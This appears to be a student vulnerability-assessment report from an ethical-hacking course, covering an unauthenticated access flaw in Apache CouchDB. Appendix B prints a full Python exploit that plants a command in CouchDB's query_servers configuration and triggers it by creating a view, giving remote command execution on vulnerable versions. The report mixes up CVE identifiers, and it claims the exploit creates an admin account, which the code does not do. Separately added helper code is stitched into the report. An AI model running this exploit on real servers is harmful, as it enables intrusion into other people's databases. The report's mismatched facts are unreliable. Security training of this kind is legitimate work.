Apache CouchDB Unauthenticated Administrative Access (CVE-2017-12635)


CONFIDENTIAL

Document Control

Version   Document Owner & Role                         Status & comments
v1.0      *Not comfortable giving*, Security Analyst    Internal Draft (Restricted Scope)

Vulnerability Assessment Report – EXCCORP-VLN-18JAN2021 Company Confidential Page 2 of 18



Legal Disclaimer
The content of this report is highly confidential and may include critical
information on Example Corp systems, network, and applications. The report
should be shared only with the intended parties.

Although maximum effort has been applied to make this report accurate, the
Example Corp Security Audit Team cannot be held responsible for
inaccuracies or system changes after the report has been issued, since new
vulnerabilities may be found once the tests are completed.

Guidance should be taken from Legal Counsel, the CISO and the Blue Team on how
best to implement the recommendations.

All other information and the formats, methods, and reporting approaches are
the intellectual property of Example Corp, are considered proprietary
information, and are provided for the purpose of internal use only.

Any copying, distribution, or use of any of the information set forth herein or
in any attachments hereto by anyone outside of Example Corp's authorized
representatives is strictly prohibited.


Table of Contents

Document Control 2
Legal Disclaimer 3
Table of Contents 4
1. Executive Summary 5
2. A Glance Through Target Security Posture 6
3. Testing Methodology 7
4. Tools & Websites Used 7
Detailed Technical Reports (Scope Limited) 8
[example.com] 9
Finding X: TITLE HERE – 7.2 10
Steps to Reproduce 11
Appendixes 12
Appendix A: Vulnerability Score Analysis – CVSS 3.0 13
Appendix B: Modified Exploit Code For CVE-2018-17188 14
Appendix C: Screenshots For Nessus & Faraday 15
Appendix D: Screenshots Of Exploited Web App 16
Appendix E: OSINT / Phishing Results Data Used 17


1. Executive Summary

In this report I will share the vulnerabilities I have found, which can be critical to Example
Corp and cost thousands of dollars. Before anything else, I would like to state that all testing has
been done in a controlled environment where no damage can be done to Example Corp or any
other company. Let’s get right to the point.

I ran a Nessus automated scan and found a total of 4 vulnerabilities within our system, one of
which is rated high. This will be the vulnerability we discuss. The vulnerability that was found
was given the name ‘CVE-2018-17188’.

Next I needed to do a manual check by exploiting the vulnerability and proving that it is something
to be concerned about, so I looked for exploits all over the internet. However, I was not able to
find any trusted exploits, so I decided to develop my own. The exploit I developed creates a
payload and is able to execute a command; it does nothing to harm anything, and through my
exploit I noticed that I am able to create an account with unauthorized administrator
privileges, hence the vulnerability is proven to be dangerous.

After that, I was requested to audit the web application. I tried my absolute best to figure
out how to crack the web application from the outside, but nothing was found. I tried curl,
Metasploit, and more tools, and was still not able to crack the web application.


2. A Glance Through Target Security Posture

This is what our security posture looks like, with the recently found vulnerability taken
into account.

The vulnerability we are facing falls under the “Unpatched Software” category, which in our
case is a threat to our inventory because the vulnerability is database related. A user with
unauthenticated administrator access can create and delete tables, steal or delete rows from the
database, and more. The database may contain valuable information.

Overall Security Rating – Some Action Attention Needed


3. Testing Methodology

1. Running an automated scan
2. Finding vulnerabilities
3. Finding / making an exploit
4. Fixing the exploit (if one was found)
5. Running the exploit and seeing if it worked.

4. Tools & Websites Used

● Nessus
● Faraday
● Metasploit
● Google
● National Vulnerability Database
● CVSS 3.0


Detailed Technical Reports (Scope Limited)

[example.com]
This host contains 4 findings in total, 3 of which are rated medium and the
other is rated high.

Total Findings   Critical   High   Medium
4                0          1      3

Apache CouchDB Unauthenticated Administrative Access – 7.2

Vulnerability Description:
Apache CouchDB Unauthenticated Administrative Access refers to unauthorized database
access, which means that any data stored within the vulnerable version of Apache CouchDB
is more than likely to be compromised and manipulated. A person with an exploit for this
vulnerability can easily create a new user on the database with administrative access without
being authenticated by verified personnel. Someone with this access is able to steal data from
tables within the database, delete data from the database, and add invalid data to the
database.

Exposure/Analysis:
Through this vulnerability we risk leaking any data that our company stores within the
database, and more than that. For example, users that are created on the database risk having the
data stored when their account was created stolen; this can cost the company more than 5 thousand
dollars.


Recommendations:
The absolute best thing to do in this situation is to just update CouchDB to its latest version.
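To support that recommendation across an inventory, the following added helper (not part of the report or its exploit) reads the JSON that CouchDB returns on its "/" welcome endpoint and decides whether the version falls inside the range the report's own exploit treats as vulnerable (1.x up to 1.7.0 and 2.x up to 2.1.0); it compares version tuples rather than collapsing the string to an integer as the exploit does, so "2.0" or "1.10.0" are handled correctly. The check_host function and its URL form are assumptions, and the sample responses are constructed.

```python
import json
import re
from urllib.request import urlopen

# Last release of each major line that the report's exploit still treats as
# vulnerable; anything newer on that line, or a later major line, is considered patched.
LAST_VULNERABLE = {1: (1, 7, 0), 2: (2, 1, 0)}


def parse_version(text):
    """'2.1.0' -> (2, 1, 0). Missing components count as 0, so '2.0' -> (2, 0, 0);
    trailing suffixes such as '-rc1' are ignored."""
    m = re.match(r"^\s*(\d+)(?:\.(\d+))?(?:\.(\d+))?", text)
    if not m:
        raise ValueError("unrecognised CouchDB version string: %r" % text)
    return tuple(int(g) if g else 0 for g in m.groups())


def is_vulnerable(version_text):
    """True when the version falls inside the range the report flags for this finding."""
    v = parse_version(version_text)
    last = LAST_VULNERABLE.get(v[0])
    if last is None:  # 3.x and later shipped after the fix; 0.x is not covered by the report
        return False
    return v <= last


def assess(welcome):
    """Turn the JSON body of CouchDB's '/' welcome endpoint into an inventory verdict."""
    version = welcome.get("version")
    if not version:
        return {"version": None, "vulnerable": None,
                "action": "version not exposed; confirm manually"}
    vuln = is_vulnerable(version)
    return {"version": version, "vulnerable": vuln,
            "action": "upgrade CouchDB" if vuln else "no action for this finding"}


def check_host(base_url, timeout=5):
    """Fetch the welcome document from a live host (assumed URL form, e.g. http://host:5984)."""
    with urlopen(base_url.rstrip("/") + "/", timeout=timeout) as resp:
        return assess(json.load(resp))


if __name__ == "__main__":
    # Constructed sample responses, not captured from any real host.
    for sample in ({"couchdb": "Welcome", "version": "2.1.0"},
                   {"couchdb": "Welcome", "version": "2.1.1"},
                   {"couchdb": "Welcome"}):
        print(assess(sample))
```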

Steps to Reproduce
Prerequisites: 2 virtual machines on the same network, one running Kali Linux and the other
being the test machine.
1. Create a new file named ‘exploit’ with the extension ‘.py’.

2. Inside ‘exploit.py’, paste the script that is shown in Appendix B of this report.

3. In a console, make sure time, requests, and argparse are all installed using pip:
‘pip install time & pip install requests & pip install argparse’
(time and argparse ship with Python's standard library and need no installation; only requests
has to be installed with pip.)

4. Run the exploit by heading to the desktop directory (‘cd desktop’) and running ‘python3 exploit.py’.


Appendixes

Appendix A:
Vulnerability Score Analysis – CVSS 3.0

1. CVE-2017-12635
https://example.com

Final Vector:
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:H

Adjusted Scores:
CVSS Base Score: 9.8
Impact Subscore: 5.9
Exploitability Subscore: 3.9
CVSS Temporal Score: 8.8
CVSS Environmental Score: 8.8
Modified Impact Subscore: 5.9
Overall CVSS Score: 8.8
Risk Rating – HIGH
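To verify the figures in this appendix, here is an added CVSS v3.0 calculator (not part of the report) that evaluates the full vector above, base, temporal and environmental, using the metric weights and round-up rule of the CVSS v3.0 specification; it reproduces the 9.8 base, 5.9 / 3.9 sub-scores and the 8.8 temporal and environmental scores listed. The round-up helper guards against floating-point noise, which the specification's later 3.1 revision also addresses.

```python
import math
from collections import defaultdict

W = {  # CVSS v3.0 metric weights from the specification; "X" (not defined) is neutral
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
    "E": {"X": 1.0, "H": 1.0, "F": 0.97, "P": 0.94, "U": 0.91},
    "RL": {"X": 1.0, "U": 1.0, "W": 0.97, "T": 0.96, "O": 0.95},
    "RC": {"X": 1.0, "C": 1.0, "R": 0.96, "U": 0.92},
    "REQ": {"X": 1.0, "H": 1.5, "M": 1.0, "L": 0.5},  # CR / IR / AR
}
PR = {"U": {"N": 0.85, "L": 0.62, "H": 0.27}, "C": {"N": 0.85, "L": 0.68, "H": 0.5}}
REPORT_VECTOR = (  # the report's final vector from Appendix A, joined onto one line
    "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:H/IR:H/AR:H"
    "/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:H")

def roundup(x):
    """CVSS round-up to one decimal; the inner round() absorbs float noise such as 9.8*10."""
    return math.ceil(round(x * 10, 5)) / 10

def iss(c, i, a, req=("X", "X", "X")):
    # Impact sub-score; the CR/IR/AR requirement weights only apply to the environmental case
    return 1 - ((1 - W["CIA"][c] * W["REQ"][req[0]]) * (1 - W["CIA"][i] * W["REQ"][req[1]])
                * (1 - W["CIA"][a] * W["REQ"][req[2]]))

def impact(scope, s):
    return 6.42 * s if scope == "U" else 7.52 * (s - 0.029) - 3.25 * (s - 0.02) ** 15

def exploitability(av, ac, pr, ui, scope):
    return 8.22 * W["AV"][av] * W["AC"][ac] * PR[scope][pr] * W["UI"][ui]

def combine(scope, imp, expl, temporal_factor=1.0):
    """Base formula (factor 1.0) or the temporal/environmental variant (factor E*RL*RC)."""
    if imp <= 0:
        return 0.0
    total = min(imp + expl if scope == "U" else 1.08 * (imp + expl), 10)
    return roundup(roundup(total) * temporal_factor)

def score(vector):
    m = defaultdict(lambda: "X", (p.split(":", 1) for p in vector.split("/")
                                  if not p.startswith("CVSS")))
    def mod(k):  # modified metric, falling back to the base metric when not defined
        return m[k] if m["M" + k] == "X" else m["M" + k]
    t = W["E"][m["E"]] * W["RL"][m["RL"]] * W["RC"][m["RC"]]
    imp = impact(m["S"], iss(m["C"], m["I"], m["A"]))
    expl = exploitability(m["AV"], m["AC"], m["PR"], m["UI"], m["S"])
    miss = min(iss(mod("C"), mod("I"), mod("A"), (m["CR"], m["IR"], m["AR"])), 0.915)
    mimp = impact(mod("S"), miss)
    mexpl = exploitability(mod("AV"), mod("AC"), mod("PR"), mod("UI"), mod("S"))
    return {"base": combine(m["S"], imp, expl), "impact": roundup(imp),
            "exploitability": roundup(expl), "temporal": combine(m["S"], imp, expl, t),
            "environmental": combine(mod("S"), mimp, mexpl, t), "modified_impact": roundup(mimp)}
```

Calling score(REPORT_VECTOR) returns the six figures above as a dictionary; a vector with a leading "CVSS:3.0/" prefix is accepted as well.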


Appendix B:
Modified Exploit Code For CVE-2018-17188

Example:
#!/usr/bin/env python3
# Author: tubez (tubeycat)
# Date of creation: 9/6/2021
# Description: This is a custom exploit for the Udacity Ethical Hacking Nano Degree Course
# dedicated for Project #1
# How to use: Simply run this python script with all the required libraries

# This script is dangerous because we can simply create a new user on the database with admin
# privileges with a few lines of code, however as the instructions said that I was not supposed to
# break everything, its for showing that it is dangerous and securing the company.

# CONTEXT FOR UDACITY REVIEWERS: I wasn't able to find any exploits that actually worked so
# I wrote my own which took a lot of time.

import time
import requests
from requests.auth import HTTPBasicAuth  # imported by the original script but not used
import argparse  # imported by the original script but not used

target = "http://10.10.10.10:5984"


def main():
    # Checking if the user is aware of what they are about to execute
    awareness = input(
        "Are you aware that this exploit that you are about to execute CAN be dangerous in an "
        "uncontrolled environment? (y/n): "
    )
    if awareness != "y":
        exit()

    awareness = input(
        "Do you agree that the creator of this exploit is not held responsible for any damage "
        "that you have accidentally done to anything within your responsibility? (y/n): "
    )
    if awareness != "y":
        exit()

    print(
        "Thank you for agreeing to these terms, please read the following before the exploit "
        "is executed:"
    )
    print("")
    print(
        "This exploit is initially developed for ethical purposes, and should not deal any "
        "damage upon executing"
    )
    print(
        "The only purpose of this exploit is to provide evidence that this exploit can be "
        "dangerous."
    )
    print("")
    print("Executing the exploit in 10 seconds!")
    time.sleep(10)

    # Getting the version of CouchDB from target
    version = requests.get(target).json()["version"]
    print("Found version: " + version)
    # Converting it to an integer so we can check the version within an if statement
    versionInt = int(version.replace(".", ""))
    # Checking if the version is vulnerable
    print("Checking if version is vulnerable")
    if ((versionInt <= 170 and int(version[0]) == 1)
            or (versionInt <= 210 and int(version[0]) == 2)):
        print("Version is found to be vulnerable!")
        # If it is vulnerable, we then create a new session
        print("Creating a new session")
        with requests.session() as session:
            print("Created a new session!")
            print("Applying session headers")
            # We then need to set the session headers
            session.headers = {"Content-Type": "application/json"}

            # Creating the payload
            print("Attempting to create the payload")
            command = 'WHATEVER_COMMAND'
            try:
                # We are going to check if the version is 1.x because there needs to be a
                # different exploit that runs for that specific one
                if int(version[0]) == 1:
                    # Sending a put request to set the command to whatever we want
                    session.put(target + "/_config/query_servers/cmd",
                                data='"' + command + '"')
                    print("Successfully created payload at " + target +
                          "/_config/query_servers/cmd")
                else:
                    # Otherwise if it is not 1.x then we execute this
                    # We send out a get request of all the nodes from http://target/_membership
                    host = session.get(target + "/_membership").json()["all_nodes"][0]
                    # Then from those we go to target/_node/<node>/_config and so on
                    session.put(target + "/_node/" + host + "/_config/query_servers/cmd",
                                data='"' + command + '"')
                    print("Successfully created payload at " + target +
                          "/_node/" + host + "/_config/query_servers/cmd")
            except requests.exceptions.HTTPError as e:
                print("Unable to create command payload")
                print(e)

            print("Attempting to execute the payload")
            while True:
                time.sleep(0.5)
                try:
                    # Same thing here, if it is 1.x we do something different than the others
                    if int(version[0]) == 1:
                        session.post(target + "/zzz/_temp_view?limit=10",
                                     data='{"language": "cmd", "map": ""}')
                        print(session.get(target + "/_config/query_servers").json())
                    else:
                        session.post(
                            target + "/zzz/_design/zero",
                            data='{"_id": "_design/zero", "views": {"zzz": {"map": ""} }, '
                                 '"language": "cmd"}'
                        )
                    print("Executed command! (Command: " + command + ")")
                    break
                except requests.exceptions.HTTPError:
                    print("Failed to execute payload, attempting again.")

            # Next we want to remove all the things we made
            # First of all we delete the file we made on there by sending a delete request
            print("Cleaning up...")
            try:
                session.delete(target + "/zzz")
                print("Deleted file used for exploit!")
            except requests.exceptions.HTTPError:
                print("Unable to remove file")

            # Then we want to remove the payload
            try:
                if int(version[0]) == 1:
                    session.delete(target + "/_config/query_servers/cmd")
                else:
                    host = session.get(target + "/_membership").json()["all_nodes"][0]
                    session.delete(target + "/_node/" + host + "/_config/query_servers/cmd")
                print("Deleted payload!")
            except requests.exceptions.HTTPError:
                print("Unable to remove payload")

            print("Exploit has been completed and cleaned!")

    else:
        # As Sagar Bansal (Instructor of udacity course) said: 'If there is no vulnerability,
        # there is no exploit' so we are following that by terminating
        # the program if the version that we are exploiting is not vulnerable
        print("Not vulnerable (Version: " + version + ")")
        print(
            "As Sagar Bansal said: 'If there is no vulnerability, there is no exploit'"
        )
        exit()


if __name__ == "__main__":
    main()

Appendix C:
Screenshots For Nessus & Faraday


Appendix D:
Screenshots Of Exploited Web App


Appendix E:
OSINT / Phishing Results Data Used
